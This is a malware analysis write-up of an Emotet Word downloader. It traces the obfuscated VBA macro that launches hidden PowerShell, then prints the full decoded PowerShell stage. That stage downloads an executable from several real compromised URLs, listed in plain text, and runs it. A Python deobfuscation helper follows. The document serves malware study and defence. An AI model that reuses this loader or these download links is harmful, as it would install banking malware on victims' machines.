Notes from analysing an Emotet trojan downloader

Part 1:

Outline of the execution flow:

1. Sub Document_open() runs and calls O15ho2roxnv7ybuidx.H4b0154n64u

2.1 H4b0154n64u calls

Fl5n0bbcb9wio(), whose return value is "winmgmts:win32_Process"

2.2 H4b0154n64u calls

W1ux0__6p4lqepk = CreateObject(G0yh3lf7156ae)

2.3 H4b0154n64u calls

Set Nw0s5mi0i4948 = W7iyiz8spoc91mo(Sl2cm7hs735 + O15ho2roxnv7ybuidx.Axht6x94x6zh3vbij)

which obtains // CreateObject "winmgmts:win32_ProcessstartuP"

2.4 H4b0154n64u calls

W1ux0__6p4lqepk.Create Wlu43k5ugcf, Vf6mjdhloae576t, Nw0s5mi0i4948

2.4.1 Wlu43k5ugcf is a function name; the call Wlu43k5ugcf = Fl5n0bbcb9wio(F2ehdobzqp8u)

              obtains the PowerShell command line. PowerShell is started and the VBA code has finished its work.


Detailed analysis:

1. Sub Document_open() calls O15ho2roxnv7ybuidx.H4b0154n64u

2. The function O15ho2roxnv7ybuidx.H4b0154n64u does the following:

         2.1 G0yh3lf7156ae = Fl5n0bbcb9wio(Viwkwysmsx4anz0wt4)

         Fl5n0bbcb9wio is called with Viwkwysmsx4anz0wt4 as its argument (the second screenshot below), whose content is:

              /*": ue, s:: ue, s:w: ue, s:i: ue, s:nm: ue, s:: ue, s:gm: ue, s:t: ue, s:: ue, s:s: ue, s:: ue, s::: ue, s:w: ue, s:in: ue, s:: ue, s:3: ue, s:2: ue, s:_: ue, s:P: ue, s:ro: ue, s:: ue, s:ce: ue, s:s: ue, s:s: ue, s:"*/

What function Fl5n0bbcb9wio() does:

         At this point the return value of Fl5n0bbcb9wio() is "winmgmts:win32_Process" (removing every occurrence of the filler token ": ue, s:" from the buffer above leaves exactly this string).

         2.2 The return value "winmgmts:win32_Process" is used as the argument to create an object:

Set W1ux0__6p4lqepk = CreateObject(G0yh3lf7156ae), details as follows:

2.3 Call to function W7iyiz8spoc91mo()

Set Nw0s5mi0i4948 = W7iyiz8spoc91mo(Sl2cm7hs735 + O15ho2roxnv7ybuidx.Axht6x94x6zh3vbij)              //"winmgmts:win32_ProcessstartuP"

What function W7iyiz8spoc91mo() does:

Set W7iyiz8spoc91mo = CreateObject(Rcc0m4zmrlen_tlmqb)                   //"winmgmts:win32_ProcessstartuP"

W7iyiz8spoc91mo. _showwindow = wdKeyEquals - wdKeyEquals                 // wdKeyEquals - wdKeyEquals is 0, i.e. ShowWindow = SW_HIDE: the process created with this startup object gets no visible window

 

 

2.4 W1ux0__6p4lqepk.Create Wlu43k5ugcf, Vf6mjdhloae576t, Nw0s5mi0i4948

where (the parameters of Win32_Process.Create are CommandLine, CurrentDirectory and ProcessStartupInformation):

W1ux0__6p4lqepk = CreateObject(G0yh3lf7156ae)          //win32_process

Wlu43k5ugcf is a function name (its return value becomes the command line),

Vf6mjdhloae576t is empty,

Nw0s5mi0i4948 is: Set Nw0s5mi0i4948 = W7iyiz8spoc91mo(Sl2cm7hs735 + O15ho2roxnv7ybuidx.Axht6x94x6zh3vbij)  //"winmgmts:win32_ProcessstartuP"

2.4.1 Overview of function Wlu43k5ugcf()

                   1. Set G1myonmyip_ = Uuebqrha3c2.Content

//this module is shown in the figure:

its content is:

/*": ue, s:: ue, s:w: ue, s:i: ue, s:nm: ue, s:: ue, s:gm: ue, s:t: ue, s:: ue, s:s: ue, s:: ue, s::: ue, s:w: ue, s:in: ue, s:: ue, s:3: ue, s:2: ue, s:_: ue, s:P: ue, s:ro: ue, s:: ue, s:ce: ue, s:s: ue, s:s: ue, s:"*/

                   2. F2ehdobzqp8u = Right(G1myonmyip_.Text, Len(G1myonmyip_.Text) - 1)      // drops the first character of the module text

                   3. Wlu43k5ugcf = Fl5n0bbcb9wio(F2ehdobzqp8u)

 

 

 

Function Fl5n0bbcb9wio(Q2si2nw66sivcs2zr) is shown below:

A sensitive string appears: POwersheLL -ENCOD JABFAGgAZQBmADUAO……., identical to the PowerShell launch string seen in the Process Monitor screenshot at the top of the article:

         So Fl5n0bbcb9wio returns the string POwersheLL -ENCOD JABFAGgAZQBmADUAO…….

That is, Wlu43k5ugcf = Fl5n0bbcb9wio(F2ehdobzqp8u): the purpose of the Wlu43k5ugcf function is to obtain the key string POwersheLL -ENCOD JABFAGgAZQBmADUAO…….

Back to 2.4:

W1ux0__6p4lqepk.Create Wlu43k5ugcf, Vf6mjdhloae576t, Nw0s5mi0i4948

where:

W1ux0__6p4lqepk = CreateObject(G0yh3lf7156ae)          //win32_process

Wlu43k5ugcf is a function name,

Vf6mjdhloae576t is empty,

Nw0s5mi0i4948 is: Set Nw0s5mi0i4948 = W7iyiz8spoc91mo(Sl2cm7hs735 + O15ho2roxnv7ybuidx.Axht6x94x6zh3vbij)  //"winmgmts:win32_ProcessstartuP"

Conclusion:

PowerShell code is executed. Tracing back gives the following execution sequence:

 

 

 

1. Sub Document_open() runs and calls O15ho2roxnv7ybuidx.H4b0154n64u

2.1 H4b0154n64u calls

Fl5n0bbcb9wio(), whose return value is "winmgmts:win32_Process"

2.2 H4b0154n64u calls

W1ux0__6p4lqepk = CreateObject(G0yh3lf7156ae)

2.3 H4b0154n64u calls

Set Nw0s5mi0i4948 = W7iyiz8spoc91mo(Sl2cm7hs735 + O15ho2roxnv7ybuidx.Axht6x94x6zh3vbij)

which obtains // CreateObject "winmgmts:win32_ProcessstartuP"

2.4 H4b0154n64u calls

W1ux0__6p4lqepk.Create Wlu43k5ugcf, Vf6mjdhloae576t, Nw0s5mi0i4948

2.4.1 Wlu43k5ugcf is a function name; the call Wlu43k5ugcf = Fl5n0bbcb9wio(F2ehdobzqp8u)

              obtains the PowerShell command line and PowerShell is started. Vf6mjdhloae576t is empty, and no obvious effect of Nw0s5mi0i4948 (the Win32_ProcessStartup object from 2.3) was observed.

Execution ends here. The PowerShell command ultimately comes from Uuebqrha3c2.Content.

 

 

 

The PowerShell string is analysed next:

Part 2:

The decoded PowerShell code is as follows (spacing lost in extraction has been restored; the # comments are the analyst's annotations):

 

$Ehef59i=(('Z'+'s5')+'0'+('d5'+'b'));                                                    # junk assignment, never used

&('ne'+'w'+'-item') $Env:UserpROfIle\I2byDoI\ejo26QD\ -itemtype DIRECtory;               # New-Item: creates the drop directory

[Net.ServicePointManager]::"S`e`cUri`TyProtOcol"=(('tl'+'s12')+(',tls'+'1')+('1'+',')+'tl'+'s');              #tls12,tls11,tls

$F3ysqov=(('P'+'_lu')+'l'+('vp'+'1'));                                                   # P_lulvp1, the file name of the dropped executable

$Mlop803=('F'+('nj'+'kp8o'));                                                            # junk assignment

$Dglrx5x=$env:userprofile+(('{0}I2'+'by'+('do'+'i')+'{0}'+('E'+'jo')+'26qd{'+'0'+'}')-f[CHar]92)+$F3ysqov+('.'+('ex'+'e'));

# -f [CHar]92 substitutes a backslash for each {0}; with $F3ysqov appended the path is $env:userprofile\I2bydoi\Ejo26qd\P_lulvp1.exe
# (in the author's environment: C:\Users\Administrator\I2bydoi\Ejo26qd\P_lulvp1.exe)

$Ezwvj1m=(('We'+'7')+'e'+('t'+'ev'));                                                    # junk assignment

$Up2imep=&('new-'+'ob'+'ject') Net.wEbCLient;

# creates a Net.WebClient object

$Swkc22m=('ht'+'t'+'p'+':'+('/'+'/www.f'+'i')+'r'+('hajs'+'h')+('o'+'es.co'+'m/w')+'p'+'-a'+'d'+'m'+'i'+'n/'+'R'+'g'+'ai'+'T/'+('*h'+'tt')+'p:'+'//'+('fak'+'e')+('r'+'ea')+'d'+('.c'+'o')+('m/'+'O')+('n'+'eSi'+'gn'+'al-W'+'eb-S'+'DK-')+'H'+'T'+'T'+'PS'+('-'+'In')+('tegra'+'ti')+('on-Fil'+'es/')+('Wf/'+'*')+'h'+('t'+'tp:/')+'/'+('w'+'ww.')+'r'+('tt'+'utori')+('ng.c'+'om')+'/'+('w'+'p-i')+('n'+'clud')+('es/'+'Ll')+('bY'+'6o')+('/*h'+'t')+('tp'+'://b')+('lu'+'e')+'s'+'k'+('y'+'sol.')+('co'+'m')+'/s'+'ys'+'-'+('c'+'ach')+('e/'+'2R')+('k'+'/*ht')+('tp:'+'//cr')+('az'+'yboxs.'+'com/')+('cg'+'i')+'-'+'b'+'in'+('/I'+'aJ/'+'*ht')+('t'+'p:')+'//'+('w'+'ww')+('.pa'+'ram'+'e')+'di'+('cale'+'d'+'ucati'+'ongui')+'de'+'l'+('i'+'nes.c')+('o'+'m/')+('w'+'p-')+('ad'+'min')+('/3j'+'XU')+'5B'+('p'+'/*h')+'tt'+('p'+'://')+'n'+'uh'+('at'+'oys.c')+('o'+'m/wp')+'-'+('a'+'dmi')+('n/'+'WW')+('A4R'+'/'))."sPl`IT"([char]42);$Khmx6rc=('Bk'+('7r4'+'j')+'h');

# the concatenated string is split on [char]42 ('*') into seven download links; three of them still served a file, each an Emotet trojan, with the MD5s below:

#http://www.firhajshoes.com/wp-admin/RgaiT/

#downloadable      4c613753d03629fcea945d7ab1289f78

#http://fakeread.com/OneSignal-Web-SDK-HTTPS-Integration-Files/Wf/

#http://www.rttutoring.com/wp-includes/LlbY6o/

#http://blueskysol.com/sys-cache/2Rk/

#http://crazyboxs.com/cgi-bin/IaJ/

#downloadable      04a8af949217a0e53629de69ad9574ef

#http://www.paramedicaleducationguidelines.com/wp-admin/3jXU5Bp/

#downloadable      41dedfcd2321b9ad762f7aadb4d3e190

#http://nuhatoys.com/wp-admin/WWA4R/

foreach($Ygzxknj in $Swkc22m)

{
    try
    {
        $Up2imep."DOW`NlO`ADf`iLe"($Ygzxknj,$Dglrx5x);                    # WebClient.DownloadFile: fetch the link to the path built above

        $Ycf84fz=(('Zg'+'u3')+('d'+'yf'));                                # Zgu3dyf, junk assignment

        If((&('G'+'et-'+'Item') $Dglrx5x)."l`enGtH" -ge 21773)            # Get-Item: file length of at least 21773 bytes, presumably a check that the download completed
        {
            .('Invo'+'ke-Ite'+'m')($Dglrx5x);                            # Invoke-Item performs the default action on the item, i.e. runs C:\Users\Administrator\I2bydoi\Ejo26qd\P_lulvp1.exe

            $L7hv3yz=('C'+('t_'+'66pw'));                                 # Ct_66pw, junk assignment

            break;                                                        # stop after the first link that yields a large enough file

            $Uhr0y_j=(('Ox'+'y')+('8k'+'p')+'o')                          # Oxy8kpo, unreachable junk
        }
    }
    catch{}                                                               # a failed download is silently ignored and the next link is tried
}

$Uzmn_sg=(('Mk'+'1xz8')+'e')                                              # Mk1xz8e, junk assignment
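Both obfuscation tricks on this page, the VBA buffer in 2.1 and 2.4.1 that interleaves the real characters with the filler token ": ue, s:", and the PowerShell style of ('a'+'b')+'c' chains, '{0}x'-f[char]92 path building, backticked member names and a '*'-joined URL list split with [char]42, can be undone with a few regular expressions. The following is an added example (not the blog's or the malware author's code): the VBA blob is the one printed on the page, while the PowerShell sample is constructed in the same style with example.invalid hosts instead of the real download links.

```python
import re

# 1) VBA: the real string is interleaved with a repeated filler token ": ue, s:".
VBA_FILLER = ": ue, s:"
VBA_BLOB = ('": ue, s:: ue, s:w: ue, s:i: ue, s:nm: ue, s:: ue, s:gm: ue, s:t: ue, s:'
            ': ue, s:s: ue, s:: ue, s::: ue, s:w: ue, s:in: ue, s:: ue, s:3: ue, s:2'
            ': ue, s:_: ue, s:P: ue, s:ro: ue, s:: ue, s:ce: ue, s:s: ue, s:s: ue, s:"')

def strip_vba_filler(blob: str, filler: str = VBA_FILLER) -> str:
    """Remove every filler token; what is left is the string the macro actually uses."""
    return blob.replace(filler, "").strip('"')

# 2) PowerShell: ('a'+'b')+'c' chains, '{0}x'-f[char]92 path building, backticked names.
def normalize_ps(src: str) -> str:
    """Fold string concatenation, resolve -f [char]N, and drop backticks."""
    s = src.replace("`", "")                                   # "DOW`NlO`ADf`iLe" -> "DOWNlOADfiLe"
    prev = None
    while prev != s:                                           # repeat until nothing changes
        prev = s
        s = re.sub(r"\(\s*'([^']*)'\s*\)", r"'\g<1>'", s)                     # ('x') -> 'x'
        s = re.sub(r"'([^']*)'\s*\+\s*'([^']*)'", r"'\g<1>\g<2>'", s)        # 'a'+'b' -> 'ab'
        s = re.sub(r"'([^']*)'\s*-f\s*\[char\](\d+)",                        # '{0}a'-f[char]92 -> '\a'
                   lambda m: "'" + m.group(1).replace("{0}", chr(int(m.group(2)))) + "'",
                   s, flags=re.I)
    return s

def extract_split_urls(normalized: str) -> list:
    """Recover the list built as '<u1>*<u2>*...'.split([char]42) ([char]42 is '*')."""
    m = re.search(r"'([^']*)'\.\"?split\"?\(\[char\](\d+)\)", normalized, re.I)
    return [u for u in m.group(1).split(chr(int(m.group(2)))) if u] if m else []

# Constructed sample in the style of the decoded script above (hosts are example.invalid, not the real links).
PS_SAMPLE = '''$Dglrx5x=$env:userprofile+(('{0}I2'+'by'+('do'+'i')+'{0}'+('E'+'jo')+'26qd{'+'0'+'}')-f[CHar]92)+$F3ysqov+('.'+('ex'+'e'));
$Swkc22m=('ht'+'tp'+':/'+('/'+'a.ex')+('ampl'+'e.inv')+'alid/'+('wp-a'+'dmin/*')+'htt'+('p:/'+'/b')+('.exam'+'ple.')+('inva'+'lid/x/'))."sPl`IT"([char]42);
$Up2imep."DOW`NlO`ADf`iLe"($Ygzxknj,$Dglrx5x);'''

if __name__ == "__main__":
    print(strip_vba_filler(VBA_BLOB))                          # winmgmts:win32_Process
    print(normalize_ps(PS_SAMPLE))
    print(extract_split_urls(normalize_ps(PS_SAMPLE)))
```

The concatenation folding relies on the script containing no single quotes inside string literals, which holds for this sample; it is an analyst aid, not a PowerShell parser.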

 

 

Summary: the Word document uses VBA code to build a PowerShell command and execute it; the PowerShell downloads the banking trojan Trojan/Win32.Emotet from several links and runs it.

 

 

Appendix:

Command line:            POwersheLL -ENCOD                 (the base64-encoded command is not reproduced here)

 
